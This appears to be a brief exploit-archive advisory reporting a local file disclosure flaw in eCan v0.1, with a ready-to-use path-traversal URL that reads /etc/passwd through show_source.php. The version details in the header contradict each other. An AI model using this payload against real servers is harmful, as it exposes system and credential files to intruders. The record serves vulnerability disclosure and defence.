eCan version 0.1 suffers from a local file disclosure vulnerability.
3554c4524462040f5dda78c445352d07b4b18d5640ec8b6a0de6960bcda363d5
# Exploit Title: eCan v0.1 => Local File Disclosure Vulnerability
# Date: 11/07/2012
# Author: GoLd_M
# Vendor or Software Link: http://sourceforge.net/projects/ecan/
# Version: 1.03
# Category:: Local File Disclosure Vulnerability2
# Tested on: Xp SP 2
# Ex : [eCan v0.1]/show_source.php?fid=../../../../../../../../../../../etc/passwd
# See Test : http://upload.traidnt.net/upfiles/hGq26645.jpg